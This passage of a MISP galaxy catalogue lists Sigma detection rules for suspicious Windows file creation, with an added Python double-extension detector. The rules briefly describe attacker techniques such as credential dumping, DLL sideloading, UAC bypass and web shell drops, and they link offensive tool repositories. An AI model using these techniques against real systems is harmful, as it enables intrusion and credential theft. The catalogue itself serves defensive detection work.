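Both this rule and "Suspicious LNK Double Extension File Created" above rest on the same trick: Explorer hides the final extension of a known file type by default (and hides .lnk unconditionally through the NeverShowExt registry value), so "invoice.pdf.lnk" is shown as "invoice.pdf". The following Python is an added example, not part of the MISP galaxy or of the Sigma rules; it classifies file names from constructed Sysmon Event ID 11 (FileCreate) records and shows what Explorer would display for each hit. The decoy and executable extension sets are illustrative assumptions, not the rules' own lists.

```python
# Added example (not from the MISP galaxy or SigmaHQ): double-extension detection
# over Sysmon Event ID 11 (FileCreate) records.

# Assumed sets. Decoys are document/image types the victim expects to be harmless;
# executables are the types Windows actually runs on double-click.
DECOY_EXTENSIONS = {"pdf", "doc", "docx", "xls", "xlsx", "ppt", "pptx", "txt", "rtf", "jpg", "png"}
EXECUTABLE_EXTENSIONS = {"exe", "lnk", "scr", "pif", "com", "bat", "cmd", "vbs", "js", "hta", "ps1"}

# Constructed Sysmon Event ID 11 records; not real telemetry.
SAMPLE_FILE_EVENTS = [
    {"Image": r"C:\Program Files\Microsoft Office\root\Office16\OUTLOOK.EXE",
     "TargetFilename": r"C:\Users\alice\AppData\Local\Microsoft\Windows\INetCache\Content.Outlook\ABCD1234\invoice.pdf.lnk"},
    {"Image": r"C:\Program Files\Google\Chrome\Application\chrome.exe",
     "TargetFilename": r"C:\Users\alice\Downloads\report.docx.exe"},
    {"Image": r"C:\Program Files\7-Zip\7zG.exe",
     "TargetFilename": r"C:\Users\alice\Downloads\backup.tar.gz"},
    {"Image": r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE",
     "TargetFilename": r"C:\Users\alice\Documents\notes.txt"},
    {"Image": r"C:\Windows\System32\msiexec.exe",
     "TargetFilename": r"C:\Program Files\Vendor\setup.exe"},
    {"Image": r"C:\Windows\explorer.exe",
     "TargetFilename": r"C:\Users\bob\Desktop\photo.jpg.scr"},
]


def extensions(filename: str) -> list:
    """All extensions of a file name, lower-cased, left to right ('a.pdf.lnk' -> ['pdf', 'lnk'])."""
    parts = filename.lower().split(".")
    return parts[1:] if len(parts) > 1 else []


def is_double_extension(filename: str) -> bool:
    """True when a decoy extension is immediately followed by an executable one."""
    exts = extensions(filename)
    return len(exts) >= 2 and exts[-2] in DECOY_EXTENSIONS and exts[-1] in EXECUTABLE_EXTENSIONS


def explorer_display_name(filename: str) -> str:
    """Name Explorer shows with 'Hide extensions for known file types' on: the last extension is dropped."""
    base, sep, _ = filename.rpartition(".")
    return base if sep else filename


def scan_file_create_events(events):
    """Return one hit per FileCreate whose target name has a decoy+executable double extension."""
    hits = []
    for ev in events:
        target = ev["TargetFilename"]
        name = target.rsplit("\\", 1)[-1]
        if is_double_extension(name):
            hits.append({
                "image": ev["Image"],
                "target": target,
                "displayed_as": explorer_display_name(name),
                "is_lnk": name.lower().endswith(".lnk"),
            })
    return hits


if __name__ == "__main__":
    for hit in scan_file_create_events(SAMPLE_FILE_EVENTS):
        print(f"shown as {hit['displayed_as']!r:<20} actual {hit['target']}")
```

Matching on the last two extensions, rather than on "contains a second dot", keeps names like "backup.tar.gz" or "jquery.min.js" out of the results; the published rules additionally carry exclusions for known legitimate double extensions, which this example omits.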

Suspicious Files in Default GPO Folder

Detects copies of suspicious files (EXE/DLL) being created in the default GPO storage folder

The tag is: misp-galaxy:sigma-rules="Suspicious Files in Default GPO Folder"

Suspicious Files in Default GPO Folder has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Match Legitimate Name or Location - T1036.005" with estimative-language:likelihood-probability="almost-certain"

Table 9896. Table References

Links

https://redcanary.com/blog/intelligence-insights-november-2021/

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_susp_default_gpo_dir_write.yml

Process Explorer Driver Creation By Non-Sysinternals Binary

Detects creation of the Process Explorer drivers by processes other than Process Explorer (procexp) itself. Hack tools or malware may use the Process Explorer driver to elevate privileges, dropping it to disk for a few moments, running a service that uses that driver and removing it afterwards.

The tag is: misp-galaxy:sigma-rules="Process Explorer Driver Creation By Non-Sysinternals Binary"

Process Explorer Driver Creation By Non-Sysinternals Binary has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Exploitation for Privilege Escalation - T1068" with estimative-language:likelihood-probability="almost-certain"

Table 9897. Table References

Links

https://github.com/Yaxser/Backstab

https://learn.microsoft.com/en-us/sysinternals/downloads/process-explorer

https://www.elastic.co/security-labs/stopping-vulnerable-driver-attacks

https://news.sophos.com/en-us/2023/04/19/aukill-edr-killer-malware-abuses-process-explorer-driver/

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_sysinternals_procexp_driver_susp_creation.yml

Creation Exe for Service with Unquoted Path

Adversaries may execute their own malicious payloads by hijacking vulnerable file path references. Adversaries can take advantage of paths that lack surrounding quotations by placing an executable in a higher level directory within the path, so that Windows will choose the adversary’s executable to launch.

The tag is: misp-galaxy:sigma-rules="Creation Exe for Service with Unquoted Path"

Creation Exe for Service with Unquoted Path has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Shortcut Modification - T1547.009" with estimative-language:likelihood-probability="almost-certain"

Table 9898. Table References

Links

https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1574.009/T1574.009.md

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_creation_unquoted_service_path.yml

GoToAssist Temporary Installation Artefact

An adversary may use legitimate desktop support and remote access software, such as Team Viewer, Go2Assist, LogMein, AmmyyAdmin, etc., to establish an interactive command and control channel to target systems within networks. These services are commonly used as legitimate technical support software, and may be allowed by application control within a target environment. Remote access tools like VNC, Ammyy, and Teamviewer are used frequently when compared with other legitimate software commonly used by adversaries. (Citation: Symantec Living off the Land)

The tag is: misp-galaxy:sigma-rules="GoToAssist Temporary Installation Artefact"

GoToAssist Temporary Installation Artefact has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Remote Access Software - T1219" with estimative-language:likelihood-probability="almost-certain"

Table 9899. Table References

Links

https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1219/T1219.md#atomic-test-4---gotoassist-files-detected-test-on-windows

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_gotoopener_artefact.yml

Potential Remote Credential Dumping Activity

Detects default filenames output from the execution of CrackMapExec and Impacket-secretsdump against an endpoint.

The tag is: misp-galaxy:sigma-rules="Potential Remote Credential Dumping Activity"

Potential Remote Credential Dumping Activity has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="OS Credential Dumping - T1003" with estimative-language:likelihood-probability="almost-certain"

Table 9900. Table References

Links

https://github.com/SecureAuthCorp/impacket/blob/master/examples/secretsdump.py

https://github.com/Porchetta-Industries/CrackMapExec

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_hktl_remote_cred_dump.yml

Windows Shell/Scripting Application File Write to Suspicious Folder

Detects Windows shells and scripting applications that write files to suspicious folders

The tag is: misp-galaxy:sigma-rules="Windows Shell/Scripting Application File Write to Suspicious Folder"

Windows Shell/Scripting Application File Write to Suspicious Folder has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Command and Scripting Interpreter - T1059" with estimative-language:likelihood-probability="almost-certain"

Table 9901. Table References

Links

Internal Research

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_shell_write_susp_directory.yml

WScript or CScript Dropper - File

Detects a file ending in jse, vbe, js, vba, vbs written by cscript.exe or wscript.exe

The tag is: misp-galaxy:sigma-rules="WScript or CScript Dropper - File"

WScript or CScript Dropper - File has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Visual Basic - T1059.005" with estimative-language:likelihood-probability="almost-certain"

  • related-to: misp-galaxy:mitre-attack-pattern="JavaScript - T1059.007" with estimative-language:likelihood-probability="almost-certain"

Table 9902. Table References

Links

WScript or CScript Dropper (cea72823-df4d-4567-950c-0b579eaf0846)

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_cscript_wscript_dropper.yml

Potential Persistence Via Microsoft Office Add-In

Detects potential persistence activity via startup add-ins that load when Microsoft Office starts (.wll/.xll files are simply .dll files built for Word or Excel).

The tag is: misp-galaxy:sigma-rules="Potential Persistence Via Microsoft Office Add-In"

Potential Persistence Via Microsoft Office Add-In has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Add-ins - T1137.006" with estimative-language:likelihood-probability="almost-certain"

Table 9903. Table References

Links

https://labs.withsecure.com/publications/add-in-opportunities-for-office-persistence

Internal Research

https://github.com/redcanaryco/atomic-red-team/blob/4ae9580a1a8772db87a1b6cdb0d03e5af231e966/atomics/T1137.006/T1137.006.md

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_office_addin_persistence.yml

Remote Access Tool - ScreenConnect Temporary File

Detects the creation of files in a specific location by ScreenConnect RMM. ScreenConnect has a feature to remotely execute binaries on a target machine. These binaries are dropped to ":\Users\<username>\Documents\ConnectWiseControl\Temp\" before execution.

The tag is: misp-galaxy:sigma-rules="Remote Access Tool - ScreenConnect Temporary File"

Remote Access Tool - ScreenConnect Temporary File has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Windows Command Shell - T1059.003" with estimative-language:likelihood-probability="almost-certain"

Table 9904. Table References

Links

https://github.com/SigmaHQ/sigma/pull/4467

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_remote_access_tools_screenconnect_remote_file.yml

Legitimate Application Dropped Script

Detects script files written to disk by programs on a Windows system that should not be writing scripts

The tag is: misp-galaxy:sigma-rules="Legitimate Application Dropped Script"

Legitimate Application Dropped Script has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="System Binary Proxy Execution - T1218" with estimative-language:likelihood-probability="almost-certain"

Table 9905. Table References

Links

https://github.com/Neo23x0/sysmon-config/blob/3f808d9c022c507aae21a9346afba4a59dd533b9/sysmonconfig-export-block.xml#L1326

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_susp_legitimate_app_dropping_script.yml

Uncommon File Created In Office Startup Folder

Detects the creation of a file with an uncommon extension in an Office application startup folder

The tag is: misp-galaxy:sigma-rules="Uncommon File Created In Office Startup Folder"

Uncommon File Created In Office Startup Folder has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Malware - T1587.001" with estimative-language:likelihood-probability="almost-certain"

Table 9906. Table References

Links

http://addbalance.com/word/startup.htm

https://answers.microsoft.com/en-us/msoffice/forum/all/document-in-word-startup-folder-doesnt-open-when/44ab0932-2917-4150-8cdc-2f2cf39e86f3

https://en.wikipedia.org/wiki/List_of_Microsoft_Office_filename_extensions

https://app.any.run/tasks/d6fe6624-6ef8-485d-aa75-3d1bdda2a08c/

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_office_uncommon_file_startup.yml

WinSxS Executable File Creation By Non-System Process

Detects the creation of binaries in the WinSxS folder by non-system processes

The tag is: misp-galaxy:sigma-rules="WinSxS Executable File Creation By Non-System Process"

Table 9907. Table References

Links

https://media.defense.gov/2023/May/09/2003218554/-1/-1/0/JOINT_CSA_HUNTING_RU_INTEL_SNAKE_MALWARE_20230509.PDF

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_susp_winsxs_binary_creation.yml

Potentially Suspicious DMP/HDMP File Creation

Detects the creation of a file with the ".dmp"/".hdmp" extension by a shell or scripting application such as "cmd", "powershell", etc. Often created by software during a crash. Memory dumps can sometimes contain sensitive information such as credentials. It’s best to determine the source of the crash.

The tag is: misp-galaxy:sigma-rules="Potentially Suspicious DMP/HDMP File Creation"

Table 9908. Table References

Links

https://learn.microsoft.com/en-us/windows/win32/wer/collecting-user-mode-dumps

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_dump_file_susp_creation.yml

Suspicious Executable File Creation

Detects the creation of executables with suspicious file names. Some patterns match suspicious file extensions, others match filenames that exploit unquoted service paths.

The tag is: misp-galaxy:sigma-rules="Suspicious Executable File Creation"

Suspicious Executable File Creation has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Hide Artifacts - T1564" with estimative-language:likelihood-probability="almost-certain"

Table 9909. Table References

Links

https://app.any.run/tasks/76c69e2d-01e8-49d9-9aea-fb7cc0c4d3ad/

https://medium.com/@SumitVerma101/windows-privilege-escalation-part-1-unquoted-service-path-c7a011a8d8ae

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_susp_executable_creation.yml

Potential Homoglyph Attack Using Lookalike Characters in Filename

Detects the presence of Unicode characters which are homoglyphs, or identical in appearance, to ASCII letter characters. This is used as an obfuscation and masquerading technique. Only "perfect" homoglyphs are included; these are characters that are indistinguishable from ASCII characters and thus make excellent candidates for homoglyph attack characters.

The tag is: misp-galaxy:sigma-rules="Potential Homoglyph Attack Using Lookalike Characters in Filename"

Potential Homoglyph Attack Using Lookalike Characters in Filename has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Masquerading - T1036" with estimative-language:likelihood-probability="almost-certain"

  • related-to: misp-galaxy:mitre-attack-pattern="Rename System Utilities - T1036.003" with estimative-language:likelihood-probability="almost-certain"

Table 9910. Table References

Links

http://www.irongeek.com/homoglyph-attack-generator.php

https://redcanary.com/threat-detection-report/threats/socgholish/#threat-socgholish

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_susp_homoglyph_filename.yml

GatherNetworkInfo.VBS Reconnaissance Script Output

Detects creation of files which are the results of executing the built-in reconnaissance script "C:\Windows\System32\gatherNetworkInfo.vbs".

The tag is: misp-galaxy:sigma-rules="GatherNetworkInfo.VBS Reconnaissance Script Output"

Table 9911. Table References

Links

https://www.mandiant.com/resources/blog/trojanized-windows-installers-ukrainian-government

https://posts.slayerlabs.com/living-off-the-land/#gathernetworkinfovbs

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_lolbin_gather_network_info_script_output.yml

LiveKD Kernel Memory Dump File Created

Detects the creation of a file that has the same name as the default LiveKD kernel memory dump.

The tag is: misp-galaxy:sigma-rules="LiveKD Kernel Memory Dump File Created"

Table 9912. Table References

Links

Internal Research

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_sysinternals_livekd_default_dump_name.yml

Visual Studio Code Tunnel Remote File Creation

Detects the creation of a file by the "node.exe" process in the ".vscode-server" directory. This could be a sign of remote file creation via the VS Code tunnel feature.

The tag is: misp-galaxy:sigma-rules="Visual Studio Code Tunnel Remote File Creation"

Table 9913. Table References

Links

Internal Research

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_vscode_tunnel_remote_creation_artefacts.yml

Potential Persistence Via Outlook Form

Detects the creation of a new Outlook form which can contain malicious code

The tag is: misp-galaxy:sigma-rules="Potential Persistence Via Outlook Form"

Potential Persistence Via Outlook Form has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Outlook Forms - T1137.003" with estimative-language:likelihood-probability="almost-certain"

Table 9914. Table References

Links

https://www.slipstick.com/developer/custom-form/clean-outlooks-forms-cache/

https://speakerdeck.com/heirhabarov/hunting-for-persistence-via-microsoft-exchange-server-or-outlook?slide=76

https://learn.microsoft.com/en-us/office/vba/outlook/concepts/outlook-forms/create-an-outlook-form

https://speakerdeck.com/heirhabarov/hunting-for-persistence-via-microsoft-exchange-server-or-outlook?slide=79

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_office_outlook_newform.yml

Malicious DLL File Dropped in the Teams or OneDrive Folder

Detects creation of a malicious DLL file in the location where the OneDrive or Teams application is installed. Upon execution of the Teams or OneDrive application, the dropped malicious DLL file (“iphlpapi.dll”) is sideloaded.

The tag is: misp-galaxy:sigma-rules="Malicious DLL File Dropped in the Teams or OneDrive Folder"

Malicious DLL File Dropped in the Teams or OneDrive Folder has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="DLL Side-Loading - T1574.002" with estimative-language:likelihood-probability="almost-certain"

Table 9915. Table References

Links

https://blog.cyble.com/2022/07/27/targeted-attacks-being-carried-out-via-dll-sideloading/

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_iphlpapi_dll_sideloading.yml

UEFI Persistence Via Wpbbin - FileCreation

Detects creation of a file named "wpbbin" in the "%systemroot%\system32\" directory, which could be indicative of a UEFI-based persistence method.

The tag is: misp-galaxy:sigma-rules="UEFI Persistence Via Wpbbin - FileCreation"

UEFI Persistence Via Wpbbin - FileCreation has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="System Firmware - T1542.001" with estimative-language:likelihood-probability="almost-certain"

Table 9916. Table References

Links

https://grzegorztworek.medium.com/using-uefi-to-inject-executable-files-into-bitlocker-protected-drives-8ff4ca59c94c

https://persistence-info.github.io/Data/wpbbin.html

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_wpbbin_persistence.yml

TeamViewer Remote Session

Detects the creation of log files during a TeamViewer remote session

The tag is: misp-galaxy:sigma-rules="TeamViewer Remote Session"

TeamViewer Remote Session has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Remote Access Software - T1219" with estimative-language:likelihood-probability="almost-certain"

Table 9917. Table References

Links

https://www.teamviewer.com/en-us/

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_susp_teamviewer_remote_session.yml

BloodHound Collection Files

Detects default file names output by the BloodHound collection tool SharpHound

The tag is: misp-galaxy:sigma-rules="BloodHound Collection Files"

BloodHound Collection Files has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Local Account - T1087.001" with estimative-language:likelihood-probability="almost-certain"

  • related-to: misp-galaxy:mitre-attack-pattern="Domain Account - T1087.002" with estimative-language:likelihood-probability="almost-certain"

  • related-to: misp-galaxy:mitre-attack-pattern="Domain Trust Discovery - T1482" with estimative-language:likelihood-probability="almost-certain"

  • related-to: misp-galaxy:mitre-attack-pattern="Local Groups - T1069.001" with estimative-language:likelihood-probability="almost-certain"

  • related-to: misp-galaxy:mitre-attack-pattern="Domain Groups - T1069.002" with estimative-language:likelihood-probability="almost-certain"

  • related-to: misp-galaxy:mitre-attack-pattern="PowerShell - T1059.001" with estimative-language:likelihood-probability="almost-certain"

Table 9918. Table References

Links

https://academy.hackthebox.com/course/preview/active-directory-bloodhound/bloodhound—​data-collection

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_bloodhound_collection.yml

Creation of an WerFault.exe in Unusual Folder

Detects WerFault.exe copied to a suspicious folder, which could be a sign of WerFault DLL hijacking

The tag is: misp-galaxy:sigma-rules="Creation of an WerFault.exe in Unusual Folder"

Creation of an WerFault.exe in Unusual Folder has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="DLL Search Order Hijacking - T1574.001" with estimative-language:likelihood-probability="almost-certain"

Table 9919. Table References

Links

https://www.bleepingcomputer.com/news/security/hackers-are-now-hiding-malware-in-windows-event-logs/

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_werfault_dll_hijacking.yml

Octopus Scanner Malware

Detects Octopus Scanner Malware.

The tag is: misp-galaxy:sigma-rules="Octopus Scanner Malware"

Octopus Scanner Malware has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Supply Chain Compromise - T1195" with estimative-language:likelihood-probability="almost-certain"

  • related-to: misp-galaxy:mitre-attack-pattern="Compromise Software Dependencies and Development Tools - T1195.001" with estimative-language:likelihood-probability="almost-certain"

Table 9920. Table References

Links

https://securitylab.github.com/research/octopus-scanner-malware-open-source-supply-chain

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_mal_octopus_scanner.yml

Created Files by Microsoft Sync Center

This rule detects suspicious files created by Microsoft Sync Center (mobsync)

The tag is: misp-galaxy:sigma-rules="Created Files by Microsoft Sync Center"

Created Files by Microsoft Sync Center has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Process Injection - T1055" with estimative-language:likelihood-probability="almost-certain"

  • related-to: misp-galaxy:mitre-attack-pattern="System Binary Proxy Execution - T1218" with estimative-language:likelihood-probability="almost-certain"

Table 9921. Table References

Links

https://redcanary.com/blog/intelligence-insights-november-2021/

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_susp_creation_by_mobsync.yml

Suspicious Binary Writes Via AnyDesk

Detects AnyDesk writing binary files to disk other than "gcapi.dll". According to RedCanary research it is highly abnormal for AnyDesk to write executable files to disk besides gcapi.dll, which is a legitimate DLL that is part of the Google Chrome web browser used to interact with the Google Cloud API. (See reference section for more details)

The tag is: misp-galaxy:sigma-rules="Suspicious Binary Writes Via AnyDesk"

Suspicious Binary Writes Via AnyDesk has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Remote Access Software - T1219" with estimative-language:likelihood-probability="almost-certain"

Table 9922. Table References

Links

https://redcanary.com/blog/misbehaving-rats/

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_anydesk_writing_susp_binaries.yml

Potential RipZip Attack on Startup Folder

Detects a phishing attack which expands a ZIP file containing a malicious shortcut. If the victim expands the ZIP file via the explorer process, then the explorer process expands the malicious ZIP file and drops a malicious shortcut pointing to a backdoor into the Startup folder. Additionally, the file name of the malicious shortcut in the Startup folder contains {0AFACED1-E828-11D1-9187-B532F1E9575D}, which denotes the folder shortcut operation.

The tag is: misp-galaxy:sigma-rules="Potential RipZip Attack on Startup Folder"

Potential RipZip Attack on Startup Folder has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Boot or Logon Autostart Execution - T1547" with estimative-language:likelihood-probability="almost-certain"

Table 9923. Table References

Links

https://twitter.com/jonasLyk/status/1549338335243534336?t=CrmPocBGLbDyE4p6zTX1cg&s=19

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_ripzip_attack.yml

Potential Hidden Directory Creation Via NTFS INDEX_ALLOCATION Stream

Detects the creation of a hidden file or folder with the "::$index_allocation" stream, which can be used as a technique to prevent access to folders and files from tooling such as "explorer.exe" and "powershell.exe"

The tag is: misp-galaxy:sigma-rules="Potential Hidden Directory Creation Via NTFS INDEX_ALLOCATION Stream"

Potential Hidden Directory Creation Via NTFS INDEX_ALLOCATION Stream has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="NTFS File Attributes - T1564.004" with estimative-language:likelihood-probability="almost-certain"

Table 9924. Table References

Links

https://soroush.me/blog/2010/12/a-dotty-salty-directory-a-secret-place-in-ntfs-for-secret-files/

https://twitter.com/pfiatde/status/1681977680688738305

https://learn.microsoft.com/en-us/openspecs/windows_protocols/ms-fscc/c54dec26-1551-4d3a-a0ea-4fa40f848eb3

https://github.com/redcanaryco/atomic-red-team/blob/5c3b23002d2bbede3c07e7307165fc2a235a427d/atomics/T1564.004/T1564.004.md#atomic-test-5---create-hidden-directory-via-index_allocation

https://sec-consult.com/blog/detail/pentesters-windows-ntfs-tricks-collection/

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_susp_hidden_dir_index_allocation.yml

UAC Bypass Using Windows Media Player - File

Detects the pattern of UAC Bypass using Windows Media Player osksupport.dll (UACMe 32)

The tag is: misp-galaxy:sigma-rules="UAC Bypass Using Windows Media Player - File"

UAC Bypass Using Windows Media Player - File has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Bypass User Account Control - T1548.002" with estimative-language:likelihood-probability="almost-certain"

Table 9926. Table References

Links

https://github.com/hfiref0x/UACME

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_uac_bypass_wmp.yml

Malicious PowerShell Scripts - FileCreation

Detects the creation of known offensive PowerShell scripts used for exploitation

The tag is: misp-galaxy:sigma-rules="Malicious PowerShell Scripts - FileCreation"

Malicious PowerShell Scripts - FileCreation has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="PowerShell - T1059.001" with estimative-language:likelihood-probability="almost-certain"

Table 9927. Table References

Links

https://github.com/nettitude/Invoke-PowerThIEf

https://github.com/adrecon/AzureADRecon

https://github.com/S3cur3Th1sSh1t/PowerSharpPack/tree/master/PowerSharpBinaries

https://github.com/dafthack/DomainPasswordSpray/blob/b13d64a5834694aa73fd2aea9911a83027c465a7/DomainPasswordSpray.ps1

https://research.nccgroup.com/2022/06/06/shining-the-light-on-black-basta/

https://github.com/PowerShellMafia/PowerSploit

https://github.com/xorrior/RandomPS-Scripts/blob/848c919bfce4e2d67b626cbcf4404341cfe3d3b6/Get-DXWebcamVideo.ps1

https://github.com/samratashok/nishang

https://github.com/NetSPI/PowerUpSQL

https://github.com/Kevin-Robertson/Powermad

https://github.com/rvrsh3ll/Misc-Powershell-Scripts/blob/6f23bb41f9675d7e2d32bacccff75e931ae00554/OfficeMemScraper.ps1

https://github.com/HarmJ0y/DAMP

https://github.com/DarkCoderSc/PowerRunAsSystem/

https://github.com/BC-SECURITY/Invoke-ZeroLogon/blob/111d17c7fec486d9bb23387e2e828b09a26075e4/Invoke-ZeroLogon.ps1

https://github.com/adrecon/ADRecon

https://github.com/CsEnox/EventViewer-UACBypass

https://github.com/besimorhino/powercat

https://github.com/AlsidOfficial/WSUSpendu/

https://github.com/S3cur3Th1sSh1t/WinPwn

https://unit42.paloaltonetworks.com/threat-assessment-black-basta-ransomware/

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_powershell_exploit_scripts.yml

Suspicious File Drop by Exchange

Detects suspicious file types dropped by an Exchange component in IIS

The tag is: misp-galaxy:sigma-rules="Suspicious File Drop by Exchange"

Suspicious File Drop by Exchange has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Exploit Public-Facing Application - T1190" with estimative-language:likelihood-probability="almost-certain"

  • related-to: misp-galaxy:mitre-attack-pattern="Web Shell - T1505.003" with estimative-language:likelihood-probability="almost-certain"

Table 9928. Table References

Links

https://www.microsoft.com/security/blog/2022/09/30/analyzing-attacks-using-the-exchange-vulnerabilities-cve-2022-41040-and-cve-2022-41082/

https://en.gteltsc.vn/blog/cap-nhat-nhe-ve-lo-hong-bao-mat-0day-microsoft-exchange-dang-duoc-su-dung-de-tan-cong-cac-to-chuc-tai-viet-nam-9685.html

https://www.gteltsc.vn/blog/canh-bao-chien-dich-tan-cong-su-dung-lo-hong-zero-day-tren-microsoft-exchange-server-12714.html

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_exchange_webshell_drop_suspicious.yml

Potential Binary Or Script Dropper Via PowerShell

Detects PowerShell creating a binary executable or a script file.

The tag is: misp-galaxy:sigma-rules="Potential Binary Or Script Dropper Via PowerShell"

Table 9929. Table References

Links

https://www.zscaler.com/blogs/security-research/onenote-growing-threat-malware-distribution

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_powershell_drop_binary_or_script.yml

CSExec Service File Creation

Detects default CSExec service filename which indicates CSExec service installation and execution

The tag is: misp-galaxy:sigma-rules="CSExec Service File Creation"

CSExec Service File Creation has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Service Execution - T1569.002" with estimative-language:likelihood-probability="almost-certain"

Table 9930. Table References

Links

https://github.com/malcomvetter/CSExec

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_csexec_service.yml

Suspicious MSExchangeMailboxReplication ASPX Write

Detects suspicious activity in which the MSExchangeMailboxReplication process writes .asp and .aspx files to disk, which could be a sign of ProxyShell exploitation

The tag is: misp-galaxy:sigma-rules="Suspicious MSExchangeMailboxReplication ASPX Write"

Suspicious MSExchangeMailboxReplication ASPX Write has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Exploit Public-Facing Application - T1190" with estimative-language:likelihood-probability="almost-certain"

  • related-to: misp-galaxy:mitre-attack-pattern="Web Shell - T1505.003" with estimative-language:likelihood-probability="almost-certain"

Table 9931. Table References

Links

https://redcanary.com/blog/blackbyte-ransomware/

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_susp_exchange_aspx_write.yml

Suspicious File Created In PerfLogs

Detects suspicious files, based on their extension, being created in "C:\PerfLogs\". Note that this directory mostly contains ".etl" files

The tag is: misp-galaxy:sigma-rules="Suspicious File Created In PerfLogs"

Suspicious File Created In PerfLogs has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Command and Scripting Interpreter - T1059" with estimative-language:likelihood-probability="almost-certain"

Table 9932. Table References

Links

Internal Research

https://labs.withsecure.com/publications/fin7-target-veeam-servers

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_perflogs_susp_files.yml

PCRE.NET Package Temp Files

Detects processes creating temp files related to PCRE.NET package

The tag is: misp-galaxy:sigma-rules="PCRE.NET Package Temp Files"

PCRE.NET Package Temp Files has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Command and Scripting Interpreter - T1059" with estimative-language:likelihood-probability="almost-certain"

Table 9933. Table References

Links

https://twitter.com/rbmaslen/status/1321859647091970051

https://twitter.com/tifkin_/status/1321916444557365248

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_pcre_net_temp_file.yml

Files With System Process Name In Unsuspected Locations

Detects the creation of an executable with a system process name in folders other than the system ones (System32, SysWOW64, etc.).

The tag is: misp-galaxy:sigma-rules="Files With System Process Name In Unsuspected Locations"

Files With System Process Name In Unsuspected Locations has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Match Legitimate Name or Location - T1036.005" with estimative-language:likelihood-probability="almost-certain"

Table 9934. Table References

Links

